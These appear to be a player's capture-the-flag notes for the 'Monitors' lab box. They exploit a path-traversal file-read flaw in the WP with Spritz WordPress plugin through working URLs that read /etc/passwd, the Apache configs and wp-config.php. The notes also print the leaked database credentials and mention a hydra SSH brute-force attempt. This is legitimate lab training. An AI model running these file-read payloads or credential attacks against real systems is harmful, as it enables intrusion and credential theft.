4 wp with spritz exploit
Using https://www.exploit-db.com/exploits/44544
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
| also works with a plain absolute path, so the traversal prefix is not needed: http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
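# LFI works, RFI is failing; a .php file is displayed as source rather than executed, so the plugin appears to read and echo the file instead of including it (file disclosure, not code execution).
# can't figure out where wp-config.php is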
| tried /var/www/html; /var/ww/; /var/www/html/monitors/ and lot of combinations
# reading apache config file to get more idea
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/apache2/apache2.conf
[truncated]
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
#<Directory /srv/>
# Options Indexes FollowSymLinks
# AllowOverride None
# Require all granted
#</Directory>
<FilesMatch "^\.ht">
Require all denied
</FilesMatch>
# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# reading vhost config file to get directory information
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/apache2/sites-available/000-default.conf
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf
<VirtualHost *:80>
ServerAdmin admin@monitors.htb
DocumentRoot /var/www/html
Redirect 403 /
ErrorDocument 403 "Sorry, direct IP access is not allowed. <br><br>If you are having issues accessing the site then contact the website administrator: admin@monitors.htb"
UseCanonicalName Off
</VirtualHost>
# there is a new subdomain cacti-admin.monitors.htb
| added to /etc/hosts
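# we know it's /var/www/html, but wp-config.php does not load from there
| tried the PHP base64 filter wrapper as well; there is an intermediate directory whose name is not known
| using a relative directory traversal to get wp-config.php instead
# 3 directories back makes sense: the script sits in wp-content/plugins/wp-with-spritz/, so ../../../ resolves to the WordPress root without needing the unknown directory name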
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
define( 'DB_HOST', 'localhost' );
# possible usernames
admin
wpadmin
marcus
# pass
BestAdministrator@2020!
# hydra ssh brute > nothing
# tried all creds on wp-login > nothing
# exploring new sub-domain